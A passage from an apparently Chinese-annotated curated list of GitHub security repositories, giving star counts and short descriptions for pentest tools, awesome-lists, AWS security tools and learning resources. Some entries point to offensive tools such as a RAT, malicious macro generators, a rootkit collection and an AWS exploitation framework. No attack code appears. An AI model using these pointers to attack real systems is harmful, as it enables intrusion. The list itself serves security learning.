[martinzhou2015/srcms](https://github.com/martinzhou2015/srcms) SRCMS企业应急响应与缺陷管理系统\n- [**238**星][2m] [Py] [timlib/webxray](https://github.com/timlib/webxray) webxray is a tool for analyzing third-party content on webpages and identifying the companies which collect user data.\n- [**237**星][11m] [duoergun0729/2book](https://github.com/duoergun0729/2book) 《Web安全之深度学习实战》\n- [**236**星][10m] [Py] [cryin/javaid](https://github.com/cryin/javaid) java source code static code analysis and danger function identify prog\n- [**236**星][8m] [Py] [xhak9x/fbi](https://github.com/xhak9x/fbi) Facebook Information\n- [**231**星][18d] [o-mg/demonseed](https://github.com/o-mg/demonseed) minimal malicious USB cabl\n- [**231**星][3d] [Py] [webbreacher/whatsmyname](https://github.com/webbreacher/whatsmyname) This repository has the unified data required to perform user enumeration on various websites. Content is in a JSON file and can easily be used in other projects.\n- [**230**星][2m] [Java] [commonsguy/cwac-netsecurity](https://github.com/commonsguy/cwac-netsecurity) CWAC-NetSecurity: Simplifying Secure Internet Access\n- [**230**星][2m] [PS] [miriamxyra/eventlist](https://github.com/miriamxyra/eventlist) help improving your Audit capabilities and to help to build your Security Operation Center.\n- [**229**星][1m] [C] [vusec/ridl](https://github.com/vusec/ridl) RIDL test suite and exploits\n- [**226**星][1y] [Go] [netxfly/sec_check](https://github.com/netxfly/sec_check) 服务器安全检测的辅助工具\n- [**226**星][1y] [lanjelot/kb](https://github.com/lanjelot/kb) Respositoy of all my notes on infosec I have been building up over the years\n- [**224**星][1y] [basilfx/tradfri-hacking](https://github.com/basilfx/tradfri-hacking) Hacking the IKEA TRÅDFRI light bulbs and accessories.\n- [**223**星][1y] [Py] [tkcert/mail-security-tester](https://github.com/tkcert/mail-security-tester) A testing framework for mail security and filtering solutions.\n- [**221**星][7m] [bhdresh/dejavu](https://github.com/bhdresh/dejavu) deception framework which can be used to deploy decoys across the infrastructure\n- [**220**星][5m] [Shell] [vedetta-com/vedetta](https://github.com/vedetta-com/vedetta) OpenBSD Router Boilerplate\n- [**220**星][15d] [Py] [wazuh/wazuh-ruleset](https://github.com/wazuh/wazuh-ruleset) ruleset is used to detect attacks, intrusions, software misuse, configuration problems, application errors, malware, rootkits, system anomalies or security policy violations.\n- [**219**星][9m] [JS] [zhuyingda/veneno](https://github.com/zhuyingda/veneno) 用Node.js编写的Web安全测试框架\n- [**218**星][10m] [C] [feexd/pocs](https://github.com/feexd/pocs) \n- [**218**星][10m] [JS] [jopyth/mmm-remote-control](https://github.com/jopyth/mmm-remote-control) Magic Mirror Module to shutdown or configure your mirror\n- [**217**星][10m] [Py] [mckinsey666/vocabs](https://github.com/Mckinsey666/vocabs) A lightweight online dictionary integration to the command line\n- [**216**星][3m] [Py] [jordanpotti/cloudscraper](https://github.com/jordanpotti/cloudscraper) Tool to enumerate targets in search of cloud resources. S3 Buckets, Azure Blobs, Digital Ocean Storage Space.\n- [**216**星][9m] [C] [sleinen/samplicator](https://github.com/sleinen/samplicator) Send copies of (UDP) datagrams to multiple receivers, with optional sampling and spoofing\n- [**215**星][6m] [C#] [erfg12/memory.dll](https://github.com/erfg12/memory.dll) C# Hacking library for making PC game trainers.\n- [**214**星][5m] [Py] [infosecn1nja/maliciousmacromsbuild](https://github.com/infosecn1nja/maliciousmacromsbuild) Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.\n- [**213**星][6m] [Py] [dirkjanm/krbrelayx](https://github.com/dirkjanm/krbrelayx) Kerberos unconstrained delegation abuse toolkit\n- [**213**星][27d] [Py] [nyxgeek/lyncsmash](https://github.com/nyxgeek/lyncsmash) locate and attack Lync/Skype for Business\n- [**210**星][5m] [Java] [dschanoeh/kayak](https://github.com/dschanoeh/kayak) Kayak is a CAN bus analysis tool based on SocketCAN\n- [**210**星][3m] [Py] [si9int/cc.py](https://github.com/si9int/cc.py) Extracting URLs of a specific target based on the results of \"commoncrawl.org\"\n- [**210**星][2m] [Shell] [hak5/lanturtle-modules](https://github.com/hak5/lanturtle-modules) The Official LAN Turtle Module Repository\n- [**209**星][5m] [PS] [harmj0y/damp](https://github.com/harmj0y/damp) The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification\n- [**208**星][11d] [C#] [b4rtik/redpeanut](https://github.com/b4rtik/redpeanut) RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.\n- [**208**星][1m] [Py] [seahoh/gotox](https://github.com/seahoh/gotox) 本地自动代理,修改自 goagent。\n- [**207**星][8m] [1hack0/facebook-bug-bounty-write-ups](https://github.com/1hack0/facebook-bug-bounty-write-ups) Hunting Bugs for Fun and Profit\n- [**207**星][4m] [HCL] [byt3bl33d3r/red-baron](https://github.com/byt3bl33d3r/red-baron) Automate creating resilient, disposable, secure and agile infrastructure for Red Teams\n- [**207**星][5m] [YARA] [th3hurrican3/pepper](https://github.com/th3hurrican3/pepper) An open source script to perform malware static analysis on Portable Executable\n- [**206**星][1y] [JS] [jpcertcc/sysmonsearch](https://github.com/jpcertcc/sysmonsearch) Investigate suspicious activity by visualizing Sysmon's event log\n- [**206**星][1y] [Py] [orf/xcat](https://github.com/orf/xcat) 辅助盲 Xpath 注入,检索正在由 Xpath 查询处理的整个 XML 文档,读取主机文件系统上的任意文件,并使用出站 HTTP 请求,使服务器将数据直接发送到xcat\n- [**206**星][9m] [Py] [openstack/hacking](https://github.com/openstack/hacking) OpenStack Hacking Style Checks\n- [**204**星][1m] [Jupyter Notebook] [hunters-forge/attack-python-client](https://github.com/hunters-forge/ATTACK-Python-Client) Python Script to access ATT&CK content available in STIX via a public TAXII server\n- [**203**星][2m] [TS] [helmetjs/csp](https://github.com/helmetjs/csp) Content Security Policy middleware\n- [**203**星][7m] [JS] [wingleung/save-page-state](https://github.com/wingleung/save-page-state) A chrome extension to save the state of a page for further analysis\n- [**202**星][10d] [C++] [oisf/libhtp](https://github.com/oisf/libhtp) LibHTP is a security-aware parser for the HTTP protocol and the related bits and pieces.\n\n\n### 未分类\n\n\n\n\n### 新添加1\n\n\n\n\n### 新添加2\n\n\n\n\n### 未分类3\n\n\n\n\n### 未分类4\n\n\n\n\n### 未分类5\n\n\n\n\n### 其他\n\n\n- [**923**星][3d] [C] [arm-software/arm-trusted-firmware](https://github.com/arm-software/arm-trusted-firmware) Arm A-Profile体系结构(Armv8-A和Armv7-A)的安全世界软件的参考实现,其中包括Exception Level 3(EL3)安全监视器。\n\n\n\n\n***\n\n\n## 古老的&&有新的替代版本的\n\n\n- [**1605**星][3m] [Py] [knownsec/pocsuite](https://github.com/knownsec/pocsuite) This project has stopped to maintenance, please to\n\n\n***\n\n\n## 文章\n\n\n### 新添加的\n\n\n\n\n\n\n# 收集&&集合\n\n\n***\n\n\n## 未分类\n\n\n- [**4252**星][22d] [qazbnm456/awesome-web-security](https://github.com/qazbnm456/awesome-web-security) web 安全资源列表\n- [**3168**星][8d] [CSS] [juliocesarfort/public-pentesting-reports](https://github.com/juliocesarfort/public-pentesting-reports) Curated list of public penetration test reports released by several consulting firms and academic security groups\n- [**2904**星][3m] [infosecn1nja/red-teaming-toolkit](https://github.com/infosecn1nja/red-teaming-toolkit) A collection of open source and commercial tools that aid in red team operations.\n- [**2680**星][4d] [rmusser01/infosec_reference](https://github.com/rmusser01/infosec_reference) An Information Security Reference That Doesn't Suck\n- [**2529**星][3m] [kbandla/aptnotes](https://github.com/kbandla/aptnotes) Various public documents, whitepapers and articles about APT campaigns\n- [**2474**星][2m] [Py] [0xinfection/awesome-waf](https://github.com/0xinfection/awesome-waf) \n- [**2345**星][12d] [yeyintminthuhtut/awesome-red-teaming](https://github.com/yeyintminthuhtut/awesome-red-teaming) List of Awesome Red Teaming Resources\n- [**2161**星][10m] [exakat/php-static-analysis-tools](https://github.com/exakat/php-static-analysis-tools) A reviewed list of useful PHP static analysis tools\n- [**2116**星][1m] [infoslack/awesome-web-hacking](https://github.com/infoslack/awesome-web-hacking) A list of web application security\n- [**2067**星][2d] [tanprathan/mobileapp-pentest-cheatsheet](https://github.com/tanprathan/mobileapp-pentest-cheatsheet) The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics.\n- [**2066**星][1y] [bluscreenofjeff/red-team-infrastructure-wiki](https://github.com/bluscreenofjeff/red-team-infrastructure-wiki) Wiki to collect Red Team infrastructure hardening resources\n- [**1930**星][3m] [toolswatch/blackhat-arsenal-tools](https://github.com/toolswatch/blackhat-arsenal-tools) Black Hat 武器库\n- [**1845**星][2m] [djadmin/awesome-bug-bounty](https://github.com/djadmin/awesome-bug-bounty) A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups.\n- [**1760**星][1y] [coreb1t/awesome-pentest-cheat-sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) Collection of the cheat sheets useful for pentesting\n- [**1752**星][1m] [ngalongc/bug-bounty-reference](https://github.com/ngalongc/bug-bounty-reference) Inspired by\n- [**1716**星][4m] [R] [briatte/awesome-network-analysis](https://github.com/briatte/awesome-network-analysis) A curated list of awesome network analysis resources.\n- [**1602**星][7m] [Py] [w1109790800/penetration](https://github.com/w1109790800/penetration) 渗透 超全面的渗透资料\n- [**1585**星][7m] [Ruby] [brunofacca/zen-rails-security-checklist](https://github.com/brunofacca/zen-rails-security-checklist) Checklist of security precautions for Ruby on Rails applications.\n- [**1546**星][9d] [emijrp/awesome-awesome](https://github.com/emijrp/awesome-awesome) A curated list of awesome curated lists of many topics.\n- [**1534**星][6m] [snowming04/the-hacker-playbook-3-translation](https://github.com/snowming04/the-hacker-playbook-3-translation) 对 The Hacker Playbook 3 的翻译。\n- [**1376**星][2m] [grrrdog/java-deserialization-cheat-sheet](https://github.com/grrrdog/java-deserialization-cheat-sheet) The cheat sheet about Java Deserialization vulnerabilities\n- [**1242**星][1y] [Ruby] [eliotsykes/rails-security-checklist](https://github.com/eliotsykes/rails-security-checklist) \n- [**1207**星][8m] [joe-shenouda/awesome-cyber-skills](https://github.com/joe-shenouda/awesome-cyber-skills) A curated list of hacking environments where you can train your cyber skills legally and safely\n- [**1197**星][1m] [Py] [cujanovic/ssrf-testing](https://github.com/cujanovic/ssrf-testing) SSRF (Server Side Request Forgery) testing resources\n- [**1172**星][7d] [m4ll0k/awesome-hacking-tools](https://github.com/m4ll0k/awesome-hacking-tools) Awesome Hacking Tools\n- [**1164**星][4d] [w00t3k/awesome-cellular-hacking](https://github.com/w00t3k/awesome-cellular-hacking) Awesome-Cellular-Hacking\n- [**1145**星][1m] [Batchfile] [ckjbug/hacking](https://github.com/ckjbug/hacking) \n- [**1116**星][11d] [slowmist/knowledge-base](https://github.com/slowmist/knowledge-base) Knowledge Base 慢雾安全团队知识库\n- [**1115**星][1y] [paulsec/awesome-windows-domain-hardening](https://github.com/PaulSec/awesome-windows-domain-hardening) A curated list of awesome Security Hardening techniques for Windows.\n- [**1110**星][5m] [zbetcheckin/security_list](https://github.com/zbetcheckin/security_list) Great security list for fun and profit\n- [**1080**星][1m] [guardrailsio/awesome-golang-security](https://github.com/guardrailsio/awesome-golang-security) Awesome Golang Security resources\n- [**1030**星][7m] [stephenturner/oneliners](https://github.com/stephenturner/oneliners) Useful bash one-liners for bioinformatics.\n- [**1026**星][7d] [sundowndev/hacker-roadmap](https://github.com/sundowndev/hacker-roadmap) \n- [**1013**星][1y] [JS] [0xsobky/hackvault](https://github.com/0xsobky/hackvault) A container repository for my public web hacks!\n- [**993**星][9d] [Py] [jekil/awesome-hacking](https://github.com/jekil/awesome-hacking) Awesome hacking is an awesome collection of hacking tools.\n- [**986**星][7m] [0x4d31/awesome-threat-detection](https://github.com/0x4d31/awesome-threat-detection) A curated list of awesome threat detection and hunting resources\n- [**959**星][9m] [wtsxdev/penetration-testing](https://github.com/wtsxdev/penetration-testing) List of awesome penetration testing resources, tools and other shiny things\n- [**929**星][2m] [tom0li/collection-document](https://github.com/tom0li/collection-document) Collection of quality safety articles\n- [**921**星][7m] [PS] [api0cradle/ultimateapplockerbypasslist](https://github.com/api0cradle/ultimateapplockerbypasslist) The goal of this repository is to document the most common techniques to bypass AppLocker.\n- [**917**星][7m] [cn0xroot/rfsec-toolkit](https://github.com/cn0xroot/rfsec-toolkit) RFSec-ToolKit is a collection of Radio Frequency Communication Protocol Hacktools.无线通信协议相关的工具集,可借助SDR硬件+相关工具对无线通信进行研究。Collect with ♥ by HackSmith\n- [**906**星][24d] [Shell] [dominicbreuker/stego-toolkit](https://github.com/dominicbreuker/stego-toolkit) Collection of steganography tools - helps with CTF challenges\n- [**871**星][3d] [explife0011/awesome-windows-kernel-security-development](https://github.com/explife0011/awesome-windows-kernel-security-development) windows kernel security development\n- [**829**星][5m] [Shell] [danielmiessler/robotsdisallowed](https://github.com/danielmiessler/robotsdisallowed) A curated list of the most common and most interesting robots.txt disallowed directories.\n- [**823**星][3m] [feeicn/security-ppt](https://github.com/feeicn/security-ppt) 大安全各领域各公司各会议分享的PPT\n- [**788**星][11m] [v2-dev/awesome-social-engineering](https://github.com/v2-dev/awesome-social-engineering) 社会工程学资源集合\n- [**766**星][2m] [daviddias/awesome-hacking-locations](https://github.com/daviddias/awesome-hacking-locations) \n- [**736**星][1y] [Py] [averagesecurityguy/scripts](https://github.com/averagesecurityguy/scripts) Scripts I use during pentest engagements.\n- [**728**星][3m] [C#] [harleyqu1nn/aggressorscripts](https://github.com/harleyqu1nn/aggressorscripts) Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources\n- [**714**星][1y] [snifer/security-cheatsheets](https://github.com/snifer/security-cheatsheets) A collection of cheatsheets for various infosec tools and topics.\n- [**712**星][5m] [bit4woo/python_sec](https://github.com/bit4woo/python_sec) python安全和代码审计相关资料收集 resource collection of python security and code review\n- [**685**星][24d] [XSLT] [adon90/pentest_compilation](https://github.com/adon90/pentest_compilation) Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios\n- [**684**星][2m] [andrewjkerr/security-cheatsheets](https://github.com/andrewjkerr/security-cheatsheets) \n- [**671**星][1y] [dsasmblr/hacking-online-games](https://github.com/dsasmblr/hacking-online-games) A curated list of tutorials/resources for hacking online games.\n- [**665**星][1m] [redhuntlabs/awesome-asset-discovery](https://github.com/redhuntlabs/awesome-asset-discovery) List of Awesome Asset Discovery Resources\n- [**633**星][4m] [3gstudent/pentest-and-development-tips](https://github.com/3gstudent/pentest-and-development-tips) A collection of pentest and development tips\n- [**632**星][10m] [webbreacher/offensiveinterview](https://github.com/webbreacher/offensiveinterview) Interview questions to screen offensive (red team/pentest) candidates\n- [**629**星][4m] [bypass007/safety-project-collection](https://github.com/bypass007/safety-project-collection) 收集一些比较优秀的开源安全项目,以帮助甲方安全从业人员构建企业安全能力。\n- [**619**星][1y] [jiangsir404/audit-learning](https://github.com/jiangsir404/audit-learning) 记录自己对《代码审计》的理解和总结,对危险函数的深入分析以及在p牛的博客和代码审计圈的收获\n- [**613**星][3m] [Shell] [ashishb/osx-and-ios-security-awesome](https://github.com/ashishb/osx-and-ios-security-awesome) OSX and iOS related security tools\n- [**601**星][1m] [Py] [hslatman/awesome-industrial-control-system-security](https://github.com/hslatman/awesome-industrial-control-system-security) 工控系统安全资源列表\n- [**593**星][23d] [lirantal/awesome-nodejs-security](https://github.com/lirantal/awesome-nodejs-security) Awesome Node.js Security resources\n- [**592**星][12m] [pandazheng/ioshackstudy](https://github.com/pandazheng/ioshackstudy) IOS安全学习资料汇总\n- [**571**星][3m] [r35tart/penetration_testing_case](https://github.com/r35tart/penetration_testing_case) 用于记录分享一些有趣的案例\n- [**560**星][9m] [guardrailsio/awesome-python-security](https://github.com/guardrailsio/awesome-python-security) Awesome Python Security resources\n- [**558**星][10m] [guardrailsio/awesome-php-security](https://github.com/guardrailsio/awesome-php-security) Awesome PHP Security Resources\n- [**530**星][20d] [a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map) Linux内核防御地图\n- [**477**星][1y] [hack-with-github/powerful-plugins](https://github.com/hack-with-github/powerful-plugins) Powerful plugins and add-ons for hackers\n- [**468**星][19d] [meitar/awesome-cybersecurity-blueteam](https://github.com/meitar/awesome-cybersecurity-blueteam) \n- [**465**星][26d] [gradiuscypher/infosec_getting_started](https://github.com/gradiuscypher/infosec_getting_started) A collection of resources/documentation/links/etc to help people learn about Infosec and break into the field.\n- [**460**星][4m] [C++] [comaeio/opcde](https://github.com/comaeio/opcde) OPCDE Cybersecurity Conference Materials\n- [**448**星][7m] [jnusimba/miscsecnotes](https://github.com/jnusimba/miscsecnotes) some learning notes about Web/Cloud/Docker Security、 Penetration Test、 Security Building\n- [**438**星][1y] [meitar/awesome-lockpicking](https://github.com/meitar/awesome-lockpicking) 有关锁、保险箱、钥匙的指南、工具及其他资源的列表\n- [**437**星][4m] [re4lity/hacking-with-golang](https://github.com/re4lity/hacking-with-golang) Golang安全资源合集\n- [**426**星][21d] [dropsofzut/awesome-security-weixin-official-accounts](https://github.com/dropsofzut/awesome-security-weixin-official-accounts) 网络安全类公众号推荐,欢迎大家推荐\n- [**423**星][12m] [Lua] [w3h/icsmaster](https://github.com/w3h/icsmaster) 整合工控安全相关资源\n- [**411**星][5d] [Py] [bl4de/security-tools](https://github.com/bl4de/security-tools) Collection of small security tools created mostly in Python. CTFs, pentests and so on\n- [**411**星][1m] [husnainfareed/awesome-ethical-hacking-resources](https://github.com/husnainfareed/Awesome-Ethical-Hacking-Resources) \n- [**407**星][8m] [kai5263499/osx-security-awesome](https://github.com/kai5263499/osx-security-awesome) A collection of OSX and iOS security resources\n- [**397**星][7m] [HTML] [gexos/hacking-tools-repository](https://github.com/gexos/hacking-tools-repository) A list of security/hacking tools that have been collected from the internet. Suggestions are welcomed.\n- [**392**星][2m] [dsopas/assessment-mindset](https://github.com/dsopas/assessment-mindset) 安全相关的思维导图, 可用于pentesting, bug bounty, red-teamassessments\n- [**383**星][2m] [thejambo/awesome-testing](https://github.com/thejambo/awesome-testing) A curated list of testing resources\n- [**375**星][8m] [opencybertranslationproject/linux-basics-for-hackers](https://github.com/opencybertranslationproject/linux-basics-for-hackers) 书籍《Linux Basics for Hackers》2019版中文翻译版\n- [**369**星][20d] [fkromer/awesome-ros2](https://github.com/fkromer/awesome-ros2) The Robot Operating System Version 2.0 is awesome!\n- [**363**星][3d] [hongrisec/web-security-attack](https://github.com/hongrisec/web-security-attack) Web安全相关内容\n- [**345**星][2m] [softwareunderground/awesome-open-geoscience](https://github.com/softwareunderground/awesome-open-geoscience) Curated from repositories that make our lives as geoscientists, hackers and data wranglers easier or just more awesome\n- [**335**星][t] [stamparm/ipsum](https://github.com/stamparm/ipsum) Daily feed of bad IPs (with blacklist hit scores)\n- [**334**星][5d] [PS] [mgeeky/penetration-testing-tools](https://github.com/mgeeky/penetration-testing-tools) A collection of my Penetration Testing scripts, tools, cheatsheets collected over years, used during real-world assignments or collected from various good quality sources.\n- [**327**星][9m] [pxlpnk/awesome-ruby-security](https://github.com/pxlpnk/awesome-ruby-security) Awesome Ruby Security resources\n- [**321**星][2m] [HTML] [eugenekolo/sec-tools](https://github.com/eugenekolo/sec-tools) A set of security related tools\n- [**318**星][3d] [cryptax/confsec](https://github.com/cryptax/confsec) Security, hacking conferences (list)\n- [**315**星][22d] [trimstray/technical-whitepapers](https://github.com/trimstray/technical-whitepapers) 收集:IT白皮书、PPT、PDF、Hacking、Web应用程序安全性、数据库、逆向等\n- [**312**星][10m] [Shell] [swoodford/aws](https://github.com/swoodford/aws) A collection of bash shell scripts for automating various tasks with Amazon Web Services using the AWS CLI and jq.\n- [**310**星][1y] [1522402210/2018-blackhat-tools-list](https://github.com/1522402210/2018-blackhat-tools-list) 2018 BlackHat Tools List\n- [**309**星][2m] [no-github/dork-admin](https://github.com/no-github/dork-admin) 盘点近年来的数据泄露、供应链污染事件\n- [**299**星][15d] [JS] [aws-samples/aws-serverless-security-workshop](https://github.com/aws-samples/aws-serverless-security-workshop) In this workshop, you will learn techniques to secure a serverless application built with AWS Lambda, Amazon API Gateway and RDS Aurora. We will cover AWS services and features you can leverage to improve the security of a serverless applications in 5 domains: identity & access management, code, data, infrastructure, logging & monitoring.\n- [**295**星][1y] [findneo/newbie-security-list](https://github.com/findneo/newbie-security-list) 网络安全学习资料,欢迎补充\n- [**294**星][7m] [JS] [ma3k4h3d/papers](https://github.com/ma3k4h3d/papers) Some papers about cyber security\n- [**287**星][10m] [wallarm/awesome-nginx-security](https://github.com/wallarm/awesome-nginx-security) \n- [**276**星][4m] [mattnotmax/cyberchef-recipes](https://github.com/mattnotmax/cyberchef-recipes) A list of cyber-chef recipes\n- [**272**星][8d] [JS] [ropnop/serverless_toolkit](https://github.com/ropnop/serverless_toolkit) A collection of useful Serverless functions I use when pentesting\n- [**260**星][5m] [zhaoweiho/web-sec-interview](https://github.com/zhaoweiho/web-sec-interview) Information Security (Web Security/Penetration Testing Direction) Interview Questions/Solutions 信息安全(Web安全/渗透测试方向)面试题/解题思路\n- [**260**星][27d] [thelsa/cs-checklist](https://github.com/thelsa/cs-checklist) PC客户端(C-S架构)渗透测试checklist / Client side(C-S) penestration checklist\n- [**243**星][7d] [euphrat1ca/security_w1k1](https://github.com/euphrat1ca/security_w1k1) collect\n- [**239**星][6d] [pe3zx/my-infosec-awesome](https://github.com/pe3zx/my-infosec-awesome) My curated list of awesome links, resources and tools on infosec related topics\n- [**228**星][6m] [guardrailsio/awesome-dotnet-security](https://github.com/guardrailsio/awesome-dotnet-security) Awesome .NET Security Resources\n- [**223**星][5d] [decalage2/awesome-security-hardening](https://github.com/decalage2/awesome-security-hardening) A collection of awesome security hardening guides, tools and other resources\n- [**222**星][9m] [jesusprubio/awesome-nodejs-pentest](https://github.com/jesusprubio/awesome-nodejs-pentest) \n- [**221**星][4m] [security-checklist/php-security-check-list](https://github.com/security-checklist/php-security-check-list) PHP Security Check List [ EN ]\n- [**216**星][10m] [puresec/awesome-serverless-security](https://github.com/puresec/awesome-serverless-security) A curated list of awesome serverless security resources such as (e)books, articles, whitepapers, blogs and research papers.\n- [**214**星][3d] [shogunlab/awesome-hyper-v-exploitation](https://github.com/shogunlab/awesome-hyper-v-exploitation) A curated list of Hyper-V exploitation resources, fuzzing and vulnerability research.\n- [**213**星][10m] [jeansgit/redteam](https://github.com/jeansgit/redteam) RedTeam资料收集整理\n- [**213**星][3m] [Shell] [xu-jian/vps](https://github.com/xu-jian/vps) 个人笔记汇总\n- [**209**星][28d] [sigp/solidity-security-blog](https://github.com/sigp/solidity-security-blog) Comprehensive list of known attack vectors and common anti-patterns\n- [**207**星][1y] [faizann24/resources-for-learning-hacking](https://github.com/faizann24/resources-for-learning-hacking) All the resources I could find for learning Ethical Hacking and penetration testing.\n\n\n***\n\n\n## 混合型收集\n\n\n- [**24868**星][8d] [trimstray/the-book-of-secret-knowledge](https://github.com/trimstray/the-book-of-secret-knowledge) A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more.\n- [**10920**星][26d] [enaqx/awesome-pentest](https://github.com/enaqx/awesome-pentest) 渗透测试资源/工具集\n- [**5513**星][9m] [carpedm20/awesome-hacking](https://github.com/carpedm20/awesome-hacking) Hacking教程、工具和资源\n- [**5121**星][2m] [sbilly/awesome-security](https://github.com/sbilly/awesome-security) 与安全相关的软件、库、文档、书籍、资源和工具等收集\n- [**3230**星][6d] [Rich Text Format] [the-art-of-hacking/h4cker](https://github.com/The-Art-of-Hacking/h4cker) 资源收集:hacking、渗透、数字取证、事件响应、漏洞研究、漏洞开发、逆向\n- [**1904**星][20d] [olivierlaflamme/cheatsheet-god](https://github.com/olivierlaflamme/cheatsheet-god) Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet\n- [**591**星][6d] [Perl] [bollwarm/sectoolset](https://github.com/bollwarm/sectoolset) 安全项目工具集合\n- [**587**星][6m] [d30sa1/rootkits-list-download](https://github.com/d30sa1/rootkits-list-download) Rootkit收集\n\n\n***\n\n\n## 无工具类收集\n\n\n- [**34045**星][21d] [Py] [minimaxir/big-list-of-naughty-strings](https://github.com/minimaxir/big-list-of-naughty-strings) “淘气”的字符串列表,当作为用户输入时很容易引发问题\n- [**9042**星][3m] [vitalysim/awesome-hacking-resources](https://github.com/vitalysim/awesome-hacking-resources) A collection of hacking / penetration testing resources to make you better!\n- [**3616**星][9d] [blacckhathaceekr/pentesting-bible](https://github.com/blacckhathaceekr/pentesting-bible) links reaches 10000 links & 10000 pdf files .Learn Ethical Hacking and penetration testing .hundreds of ethical hacking & penetration testing & red team & cyber security & computer science resources.\n- [**2800**星][2m] [secwiki/sec-chart](https://github.com/secwiki/sec-chart) 安全思维导图集合\n- [**2671**星][1y] [HTML] [chybeta/web-security-learning](https://github.com/chybeta/web-security-learning) Web-Security-Learning\n- [**2519**星][17d] [onlurking/awesome-infosec](https://github.com/onlurking/awesome-infosec) A curated list of awesome infosec courses and training resources.\n- [**2356**星][11m] [hack-with-github/free-security-ebooks](https://github.com/hack-with-github/free-security-ebooks) Free Security and Hacking eBooks\n- [**2118**星][3m] [yeahhub/hacking-security-ebooks](https://github.com/yeahhub/hacking-security-ebooks) Top 100 Hacking & Security E-Books (Free Download)\n- [**1956**星][1m] [Py] [nixawk/pentest-wiki](https://github.com/nixawk/pentest-wiki) PENTEST-WIKI is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others.\n- [**1955**星][1m] [hmaverickadams/beginner-network-pentesting](https://github.com/hmaverickadams/beginner-network-pentesting) Notes for Beginner Network Pentesting Course\n\n\n***\n\n\n## 收集类的收集\n\n\n- [**33101**星][3m] [hack-with-github/awesome-hacking](https://github.com/hack-with-github/awesome-hacking) A collection of various awesome lists for hackers, pentesters and security researchers\n\n\n***\n\n\n## 教育资源&&课程&&教程&&书籍\n\n\n- [**10944**星][2m] [CSS] [hacker0x01/hacker101](https://github.com/hacker0x01/hacker101) Hacker101\n- [**3945**星][4m] [PHP] [paragonie/awesome-appsec](https://github.com/paragonie/awesome-appsec) A curated list of resources for learning about application security\n- [**959**星][5m] [bugcrowd/bugcrowd_university](https://github.com/bugcrowd/bugcrowd_university) 研究者社区的教育内容\n- [**936**星][7m] [Py] [osirislab/hack-night](https://github.com/osirislab/Hack-Night) a sobering introduction to offensive security\n\n\n***\n\n\n## 笔记&&Tips&&Tricks\n\n\n### 未分类\n\n\n- [**2816**星][2m] [paulsec/awesome-sec-talks](https://github.com/paulsec/awesome-sec-talks) A collected list of awesome security talks\n- [**864**星][2d] [Py] [lylemi/learn-web-hacking](https://github.com/lylemi/learn-web-hacking) Web安全学习笔记\n- [**723**星][3m] [uknowsec/active-directory-pentest-notes](https://github.com/uknowsec/active-directory-pentest-notes) 个人域渗透学习笔记\n- [**593**星][1m] [PS] [threatexpress/red-team-scripts](https://github.com/threatexpress/red-team-scripts) A collection of Red Team focused tools, scripts, and notes\n\n\n### blog\n\n\n- [**1229**星][5m] [chalker/notes](https://github.com/chalker/notes) Some public notes\n\n\n\n\n***\n\n\n## Talk&&Conference \n\n\n\n\n***\n\n\n## 文档&&Documentation&&规则说明&&RFC\n\n\n- [**1705**星][10m] [CSS] [bagder/http2-explained](https://github.com/bagder/http2-explained) A detailed document explaining and documenting HTTP/2, the successor to the widely popular HTTP/1.1 protocol\n\n\n# 特定目标\n\n\n***\n\n\n## 未分类-XxTarget\n\n\n- [**4177**星][4d] [Java] [spring-projects/spring-security](https://github.com/spring-projects/spring-security) Spring Security\n- [**2942**星][6d] [Go] [securego/gosec](https://github.com/securego/gosec) Golang security checker\n- [**1906**星][2m] [Py] [pycqa/bandit](https://github.com/pycqa/bandit) 在Python代码中查找常见的安全问题\n\n\n***\n\n\n## AWS\n\n\n- [**4471**星][1y] [Go] [wallix/awless](https://github.com/wallix/awless) A Mighty CLI for AWS\n- [**4271**星][4m] [Py] [dxa4481/trufflehog](https://github.com/dxa4481/trufflehog) Searches through git repositories for high entropy strings and secrets, digging deep into commit history\n- [**3301**星][5d] [Shell] [toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.\n- [**3154**星][5d] [JS] [duo-labs/cloudmapper](https://github.com/duo-labs/cloudmapper) 生成AWS环境的网络拓扑图\n- [**2895**星][3d] [Go] [99designs/aws-vault](https://github.com/99designs/aws-vault) A vault for securely storing and accessing AWS credentials in development environments\n- [**2645**星][4m] [Java] [teevity/ice](https://github.com/teevity/ice) AWS Usage Tool\n- [**2374**星][5m] [Go] [mlabouardy/komiser](https://github.com/mlabouardy/komiser) \n- [**1912**星][6d] [Shell] [toniblyx/prowler](https://github.com/toniblyx/prowler) AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and DOZENS of additional checks including GDPR and HIPAA (+100). Official CIS for AWS guide:\n- [**1895**星][3d] [Py] [mozilla/mozdef](https://github.com/mozilla/mozdef) Mozilla Enterprise Defense Platform\n- [**1604**星][1y] [Py] [nccgroup/scout2](https://github.com/nccgroup/Scout2) Security auditing tool for AWS environments\n- [**1386**星][12m] [Py] [eth0izzle/bucket-stream](https://github.com/eth0izzle/bucket-stream) 通过certstream 监控多种证书 transparency 日志, 进而查找有趣的 Amazon S3 Buckets\n- [**1198**星][17d] [Py] [lyft/cartography](https://github.com/lyft/cartography) Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.\n- [**1149**星][4m] [Py] [rhinosecuritylabs/pacu](https://github.com/rhinosecuritylabs/pacu) The AWS exploitation framework, designed for testing the security of Amazon Web Services environments.\n- [**938**星][3m] [Py] [sa7mon/s3scanner](https://github.com/sa7mon/s3scanner) Scan for open 